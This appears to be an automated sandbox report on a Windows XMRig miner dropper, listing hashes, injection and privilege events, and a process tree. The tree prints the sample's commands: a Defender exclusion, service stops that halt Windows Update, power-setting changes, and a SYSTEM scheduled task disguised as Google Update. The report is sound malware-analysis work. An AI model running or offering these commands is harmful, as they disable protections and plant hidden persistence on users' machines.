Analysis
-
max time kernel
150s -
max time network
144s -
platform
windows10-2004_x64 -
resource
win10v2004-20230703-en -
resource tags
arch:x64arch:x86image:win10v2004-20230703-enlocale:en-usos:windows10-2004-x64system -
submitted
12-07-2023 01:20
Static task
static1
Behavioral task
behavioral1
Sample
f23ffdfa7f009f89ccc1629a17278019bb82a5046315eed79c921171d4b7b830.exe
Resource
win7-20230703-en
General
-
Target
f23ffdfa7f009f89ccc1629a17278019bb82a5046315eed79c921171d4b7b830.exe
-
Size
5.6MB
-
MD5
56270856311af456a2d0216129d8daf5
-
SHA1
c0fff6d6a9fda4b7086422efa1e4b1fa3e3258c6
-
SHA256
f23ffdfa7f009f89ccc1629a17278019bb82a5046315eed79c921171d4b7b830
-
SHA512
85d54f7d60203adad5e229a1c5a8abff92bd1a27fcf823933aa5a8d8b4d4c28d36285a0f09d1874a4fab27330ca9394c0cdc1140c8ebe398dbc47b34555d1f86
-
SSDEEP
98304:PyPCWkFm5sbtLInk76Wbe02hQsvPDVXl5nJWt+1iYD8QR6nPQ6E3CzhSmHoaxsmS:PiCpm5uINjPDVXDnJ9ik82qPQNEhSmHG
Malware Config
Signatures
-
Suspicious use of NtCreateUserProcessOtherParentProcess 11 IoCs
description pid Process procid_target PID 3664 created 3160 3664 f23ffdfa7f009f89ccc1629a17278019bb82a5046315eed79c921171d4b7b830.exe 54 PID 3664 created 3160 3664 f23ffdfa7f009f89ccc1629a17278019bb82a5046315eed79c921171d4b7b830.exe 54 PID 3664 created 3160 3664 f23ffdfa7f009f89ccc1629a17278019bb82a5046315eed79c921171d4b7b830.exe 54 PID 3664 created 3160 3664 f23ffdfa7f009f89ccc1629a17278019bb82a5046315eed79c921171d4b7b830.exe 54 PID 3664 created 3160 3664 f23ffdfa7f009f89ccc1629a17278019bb82a5046315eed79c921171d4b7b830.exe 54 PID 2844 created 3160 2844 updater.exe 54 PID 2844 created 3160 2844 updater.exe 54 PID 2844 created 3160 2844 updater.exe 54 PID 2844 created 3160 2844 updater.exe 54 PID 2844 created 3160 2844 updater.exe 54 PID 2844 created 3160 2844 updater.exe 54 -
XMRig Miner payload 11 IoCs
resource yara_rule behavioral2/memory/2844-233-0x00007FF7F22B0000-0x00007FF7F2851000-memory.dmp xmrig behavioral2/memory/3780-237-0x00007FF78A620000-0x00007FF78AE0F000-memory.dmp xmrig behavioral2/memory/3780-241-0x00007FF78A620000-0x00007FF78AE0F000-memory.dmp xmrig behavioral2/memory/3780-245-0x00007FF78A620000-0x00007FF78AE0F000-memory.dmp xmrig behavioral2/memory/3780-247-0x00007FF78A620000-0x00007FF78AE0F000-memory.dmp xmrig behavioral2/memory/3780-249-0x00007FF78A620000-0x00007FF78AE0F000-memory.dmp xmrig behavioral2/memory/3780-251-0x00007FF78A620000-0x00007FF78AE0F000-memory.dmp xmrig behavioral2/memory/3780-253-0x00007FF78A620000-0x00007FF78AE0F000-memory.dmp xmrig behavioral2/memory/3780-255-0x00007FF78A620000-0x00007FF78AE0F000-memory.dmp xmrig behavioral2/memory/3780-257-0x00007FF78A620000-0x00007FF78AE0F000-memory.dmp xmrig behavioral2/memory/3780-259-0x00007FF78A620000-0x00007FF78AE0F000-memory.dmp xmrig -
Drops file in Drivers directory 2 IoCs
description ioc Process File created C:\Windows\System32\drivers\etc\hosts f23ffdfa7f009f89ccc1629a17278019bb82a5046315eed79c921171d4b7b830.exe File created C:\Windows\System32\drivers\etc\hosts updater.exe -
Stops running service(s) 3 TTPs
-
Executes dropped EXE 1 IoCs
pid Process 2844 updater.exe -
Drops file in System32 directory 3 IoCs
description ioc Process File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log powershell.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe -
Suspicious use of SetThreadContext 2 IoCs
description pid Process procid_target PID 2844 set thread context of 4116 2844 updater.exe 134 PID 2844 set thread context of 3780 2844 updater.exe 135 -
Drops file in Program Files directory 2 IoCs
description ioc Process File created C:\Program Files\Google\Libs\WR64.sys updater.exe File created C:\Program Files\Google\Chrome\updater.exe f23ffdfa7f009f89ccc1629a17278019bb82a5046315eed79c921171d4b7b830.exe -
Launches sc.exe 10 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 524 sc.exe 4560 sc.exe 800 sc.exe 2140 sc.exe 3924 sc.exe 3760 sc.exe 4588 sc.exe 2812 sc.exe 3796 sc.exe 3428 sc.exe -
Modifies data under HKEY_USERS 64 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 3664 f23ffdfa7f009f89ccc1629a17278019bb82a5046315eed79c921171d4b7b830.exe 3664 f23ffdfa7f009f89ccc1629a17278019bb82a5046315eed79c921171d4b7b830.exe 1512 powershell.exe 1512 powershell.exe 3664 f23ffdfa7f009f89ccc1629a17278019bb82a5046315eed79c921171d4b7b830.exe 3664 f23ffdfa7f009f89ccc1629a17278019bb82a5046315eed79c921171d4b7b830.exe 3664 f23ffdfa7f009f89ccc1629a17278019bb82a5046315eed79c921171d4b7b830.exe 3664 f23ffdfa7f009f89ccc1629a17278019bb82a5046315eed79c921171d4b7b830.exe 3664 f23ffdfa7f009f89ccc1629a17278019bb82a5046315eed79c921171d4b7b830.exe 3664 f23ffdfa7f009f89ccc1629a17278019bb82a5046315eed79c921171d4b7b830.exe 564 powershell.exe 564 powershell.exe 3664 f23ffdfa7f009f89ccc1629a17278019bb82a5046315eed79c921171d4b7b830.exe 3664 f23ffdfa7f009f89ccc1629a17278019bb82a5046315eed79c921171d4b7b830.exe 2844 updater.exe 2844 updater.exe 2148 powershell.exe 2148 powershell.exe 2844 updater.exe 2844 updater.exe 2844 updater.exe 2844 updater.exe 2844 updater.exe 2844 updater.exe 4620 powershell.exe 4620 powershell.exe 2844 updater.exe 2844 updater.exe 2844 updater.exe 2844 updater.exe 3780 explorer.exe 3780 explorer.exe 3780 explorer.exe 3780 explorer.exe 3780 explorer.exe 3780 explorer.exe 3780 explorer.exe 3780 explorer.exe 3780 explorer.exe 3780 explorer.exe 3780 explorer.exe 3780 explorer.exe 3780 explorer.exe 3780 explorer.exe 3780 explorer.exe 3780 explorer.exe 3780 explorer.exe 3780 explorer.exe 3780 explorer.exe 3780 explorer.exe 3780 explorer.exe 3780 explorer.exe 3780 explorer.exe 3780 explorer.exe 3780 explorer.exe 3780 explorer.exe 3780 explorer.exe 3780 explorer.exe 3780 explorer.exe 3780 explorer.exe 3780 explorer.exe 3780 explorer.exe 3780 explorer.exe 3780 explorer.exe -
Suspicious behavior: LoadsDriver 1 IoCs
pid Process 668 Process not Found -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 1512 powershell.exe Token: SeShutdownPrivilege 4184 powercfg.exe Token: SeCreatePagefilePrivilege 4184 powercfg.exe Token: SeShutdownPrivilege 1420 powercfg.exe Token: SeCreatePagefilePrivilege 1420 powercfg.exe Token: SeDebugPrivilege 564 powershell.exe Token: SeShutdownPrivilege 784 powercfg.exe Token: SeCreatePagefilePrivilege 784 powercfg.exe Token: SeShutdownPrivilege 4216 powercfg.exe Token: SeCreatePagefilePrivilege 4216 powercfg.exe Token: SeIncreaseQuotaPrivilege 564 powershell.exe Token: SeSecurityPrivilege 564 powershell.exe Token: SeTakeOwnershipPrivilege 564 powershell.exe Token: SeLoadDriverPrivilege 564 powershell.exe Token: SeSystemProfilePrivilege 564 powershell.exe Token: SeSystemtimePrivilege 564 powershell.exe Token: SeProfSingleProcessPrivilege 564 powershell.exe Token: SeIncBasePriorityPrivilege 564 powershell.exe Token: SeCreatePagefilePrivilege 564 powershell.exe Token: SeBackupPrivilege 564 powershell.exe Token: SeRestorePrivilege 564 powershell.exe Token: SeShutdownPrivilege 564 powershell.exe Token: SeDebugPrivilege 564 powershell.exe Token: SeSystemEnvironmentPrivilege 564 powershell.exe Token: SeRemoteShutdownPrivilege 564 powershell.exe Token: SeUndockPrivilege 564 powershell.exe Token: SeManageVolumePrivilege 564 powershell.exe Token: 33 564 powershell.exe Token: 34 564 powershell.exe Token: 35 564 powershell.exe Token: 36 564 powershell.exe Token: SeIncreaseQuotaPrivilege 564 powershell.exe Token: SeSecurityPrivilege 564 powershell.exe Token: SeTakeOwnershipPrivilege 564 powershell.exe Token: SeLoadDriverPrivilege 564 powershell.exe Token: SeSystemProfilePrivilege 564 powershell.exe Token: SeSystemtimePrivilege 564 powershell.exe Token: SeProfSingleProcessPrivilege 564 powershell.exe Token: SeIncBasePriorityPrivilege 564 powershell.exe Token: SeCreatePagefilePrivilege 564 powershell.exe Token: SeBackupPrivilege 564 powershell.exe Token: SeRestorePrivilege 564 powershell.exe Token: SeShutdownPrivilege 564 powershell.exe Token: SeDebugPrivilege 564 powershell.exe Token: SeSystemEnvironmentPrivilege 564 powershell.exe Token: SeRemoteShutdownPrivilege 564 powershell.exe Token: SeUndockPrivilege 564 powershell.exe Token: SeManageVolumePrivilege 564 powershell.exe Token: 33 564 powershell.exe Token: 34 564 powershell.exe Token: 35 564 powershell.exe Token: 36 564 powershell.exe Token: SeIncreaseQuotaPrivilege 564 powershell.exe Token: SeSecurityPrivilege 564 powershell.exe Token: SeTakeOwnershipPrivilege 564 powershell.exe Token: SeLoadDriverPrivilege 564 powershell.exe Token: SeSystemProfilePrivilege 564 powershell.exe Token: SeSystemtimePrivilege 564 powershell.exe Token: SeProfSingleProcessPrivilege 564 powershell.exe Token: SeIncBasePriorityPrivilege 564 powershell.exe Token: SeCreatePagefilePrivilege 564 powershell.exe Token: SeBackupPrivilege 564 powershell.exe Token: SeRestorePrivilege 564 powershell.exe Token: SeShutdownPrivilege 564 powershell.exe -
Suspicious use of WriteProcessMemory 38 IoCs
description pid Process procid_target PID 3516 wrote to memory of 800 3516 cmd.exe 99 PID 3516 wrote to memory of 800 3516 cmd.exe 99 PID 3516 wrote to memory of 524 3516 cmd.exe 100 PID 3516 wrote to memory of 524 3516 cmd.exe 100 PID 3516 wrote to memory of 2140 3516 cmd.exe 101 PID 3516 wrote to memory of 2140 3516 cmd.exe 101 PID 3516 wrote to memory of 3924 3516 cmd.exe 102 PID 3516 wrote to memory of 3924 3516 cmd.exe 102 PID 3516 wrote to memory of 4560 3516 cmd.exe 103 PID 3516 wrote to memory of 4560 3516 cmd.exe 103 PID 2096 wrote to memory of 4184 2096 cmd.exe 108 PID 2096 wrote to memory of 4184 2096 cmd.exe 108 PID 2096 wrote to memory of 1420 2096 cmd.exe 109 PID 2096 wrote to memory of 1420 2096 cmd.exe 109 PID 2096 wrote to memory of 784 2096 cmd.exe 110 PID 2096 wrote to memory of 784 2096 cmd.exe 110 PID 2096 wrote to memory of 4216 2096 cmd.exe 111 PID 2096 wrote to memory of 4216 2096 cmd.exe 111 PID 2256 wrote to memory of 3760 2256 cmd.exe 121 PID 2256 wrote to memory of 3760 2256 cmd.exe 121 PID 2256 wrote to memory of 4588 2256 cmd.exe 122 PID 2256 wrote to memory of 4588 2256 cmd.exe 122 PID 2256 wrote to memory of 2812 2256 cmd.exe 123 PID 2256 wrote to memory of 2812 2256 cmd.exe 123 PID 2256 wrote to memory of 3796 2256 cmd.exe 124 PID 2256 wrote to memory of 3796 2256 cmd.exe 124 PID 2256 wrote to memory of 3428 2256 cmd.exe 125 PID 2256 wrote to memory of 3428 2256 cmd.exe 125 PID 3312 wrote to memory of 3036 3312 cmd.exe 130 PID 3312 wrote to memory of 3036 3312 cmd.exe 130 PID 3312 wrote to memory of 4032 3312 cmd.exe 131 PID 3312 wrote to memory of 4032 3312 cmd.exe 131 PID 3312 wrote to memory of 1896 3312 cmd.exe 132 PID 3312 wrote to memory of 1896 3312 cmd.exe 132 PID 3312 wrote to memory of 1636 3312 cmd.exe 133 PID 3312 wrote to memory of 1636 3312 cmd.exe 133 PID 2844 wrote to memory of 4116 2844 updater.exe 134 PID 2844 wrote to memory of 3780 2844 updater.exe 135 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵PID:3160
-
C:\Users\Admin\AppData\Local\Temp\f23ffdfa7f009f89ccc1629a17278019bb82a5046315eed79c921171d4b7b830.exe"C:\Users\Admin\AppData\Local\Temp\f23ffdfa7f009f89ccc1629a17278019bb82a5046315eed79c921171d4b7b830.exe"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Drivers directory
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
PID:3664
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1512
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc2⤵
- Suspicious use of WriteProcessMemory
PID:3516 -
C:\Windows\System32\sc.exesc stop UsoSvc3⤵
- Launches sc.exe
PID:800
-
-
C:\Windows\System32\sc.exesc stop WaaSMedicSvc3⤵
- Launches sc.exe
PID:524
-
-
C:\Windows\System32\sc.exesc stop wuauserv3⤵
- Launches sc.exe
PID:2140
-
-
C:\Windows\System32\sc.exesc stop bits3⤵
- Launches sc.exe
PID:3924
-
-
C:\Windows\System32\sc.exesc stop dosvc3⤵
- Launches sc.exe
PID:4560
-
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 02⤵
- Suspicious use of WriteProcessMemory
PID:2096 -
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-ac 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:4184
-
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-dc 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:1420
-
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-ac 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:784
-
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-dc 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:4216
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#hnwthdb#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:564
-
-
C:\Windows\System32\schtasks.exeC:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"2⤵PID:392
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:2148
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc2⤵
- Suspicious use of WriteProcessMemory
PID:2256 -
C:\Windows\System32\sc.exesc stop UsoSvc3⤵
- Launches sc.exe
PID:3760
-
-
C:\Windows\System32\sc.exesc stop WaaSMedicSvc3⤵
- Launches sc.exe
PID:4588
-
-
C:\Windows\System32\sc.exesc stop wuauserv3⤵
- Launches sc.exe
PID:2812
-
-
C:\Windows\System32\sc.exesc stop bits3⤵
- Launches sc.exe
PID:3796
-
-
C:\Windows\System32\sc.exesc stop dosvc3⤵
- Launches sc.exe
PID:3428
-
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 02⤵
- Suspicious use of WriteProcessMemory
PID:3312 -
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-ac 03⤵PID:3036
-
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-dc 03⤵PID:4032
-
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-ac 03⤵PID:1896
-
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-dc 03⤵PID:1636
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#hnwthdb#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:4620
-
-
C:\Windows\System32\conhost.exeC:\Windows\System32\conhost.exe2⤵PID:4116
-
-
C:\Windows\explorer.exeC:\Windows\explorer.exe2⤵
- Suspicious behavior: EnumeratesProcesses
PID:3780
-
-
C:\Program Files\Google\Chrome\updater.exe"C:\Program Files\Google\Chrome\updater.exe"1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Drivers directory
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2844
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
5.6MB
MD556270856311af456a2d0216129d8daf5
SHA1c0fff6d6a9fda4b7086422efa1e4b1fa3e3258c6
SHA256f23ffdfa7f009f89ccc1629a17278019bb82a5046315eed79c921171d4b7b830
SHA51285d54f7d60203adad5e229a1c5a8abff92bd1a27fcf823933aa5a8d8b4d4c28d36285a0f09d1874a4fab27330ca9394c0cdc1140c8ebe398dbc47b34555d1f86
-
Filesize
5.6MB
MD556270856311af456a2d0216129d8daf5
SHA1c0fff6d6a9fda4b7086422efa1e4b1fa3e3258c6
SHA256f23ffdfa7f009f89ccc1629a17278019bb82a5046315eed79c921171d4b7b830
SHA51285d54f7d60203adad5e229a1c5a8abff92bd1a27fcf823933aa5a8d8b4d4c28d36285a0f09d1874a4fab27330ca9394c0cdc1140c8ebe398dbc47b34555d1f86
-
Filesize
2KB
MD5d85ba6ff808d9e5444a4b369f5bc2730
SHA131aa9d96590fff6981b315e0b391b575e4c0804a
SHA25684739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA5128c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249
-
Filesize
944B
MD5cb3a799921d48256ab45414af88b0aa8
SHA18888fb5656f5f11576c0fbc3ba45d7df56000d28
SHA2565ad60a0e324106c6b5a8a7c41b4eac83234ed53cf26025dd4d63c0750b265105
SHA51221b53b49d0f95cb600444b15a274c31d9374ae96dc2ab464e6ada96bae11f1000e92f6f51f62e5b91891dbbb30e6ab9c71006a9a166b8d4ae24457dcd7efdf69
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
3KB
MD500930b40cba79465b7a38ed0449d1449
SHA14b25a89ee28b20ba162f23772ddaf017669092a5
SHA256eda1aae2c8fce700e3bdbe0186cf3db88400cf0ac13ec736e84dacba61628a01
SHA512cbe4760ec041e7da7ab86474d5c82969cfccb8ccc5dbdac9436862d5b1b86210ab90754d3c8da5724176570d8842e57a716a281acba8719e90098a6f61a17c62
-
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
Filesize4KB
MD5bdb25c22d14ec917e30faf353826c5de
SHA16c2feb9cea9237bc28842ebf2fea68b3bd7ad190
SHA256e3274ce8296f2cd20e3189576fbadbfa0f1817cdf313487945c80e968589a495
SHA512b5eddbfd4748298a302e2963cfd12d849130b6dcb8f0f85a2a623caed0ff9bd88f4ec726f646dbebfca4964adc35f882ec205113920cb546cc08193739d6728c
-
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize1KB
MD5b42c70c1dbf0d1d477ec86902db9e986
SHA11d1c0a670748b3d10bee8272e5d67a4fabefd31f
SHA2568ed3b348989cdc967d1fc0e887b2a2f5a656680d8d14ebd3cb71a10c2f55867a
SHA51257fb278a8b2e83d01fac2a031c90e0e2bd5e4c1a360cfa4308490eb07e1b9d265b1f28399d0f10b141a6438ba92dd5f9ce4f18530ec277fece0eb7678041cbc5